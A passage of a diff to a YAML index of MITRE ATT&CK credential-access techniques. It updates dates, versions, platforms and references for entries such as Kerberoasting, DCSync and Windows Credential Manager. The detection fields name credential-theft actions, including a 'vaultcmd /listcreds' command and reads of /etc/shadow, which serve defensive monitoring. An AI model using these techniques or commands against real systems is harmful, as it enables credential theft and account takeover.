         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47845,7 +48577,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47871,13 +48603,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47894,24 +48624,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47952,36 +48682,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -48002,6 +48709,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -48016,52 +48724,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -48083,6 +48781,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -48093,23 +48792,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -48180,9 +48906,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -48241,12 +48966,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -48278,6 +49002,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48287,7 +49012,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -48299,111 +49023,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -48414,26 +49076,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -48446,6 +49170,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -48482,17 +49207,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -48538,81 +49263,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
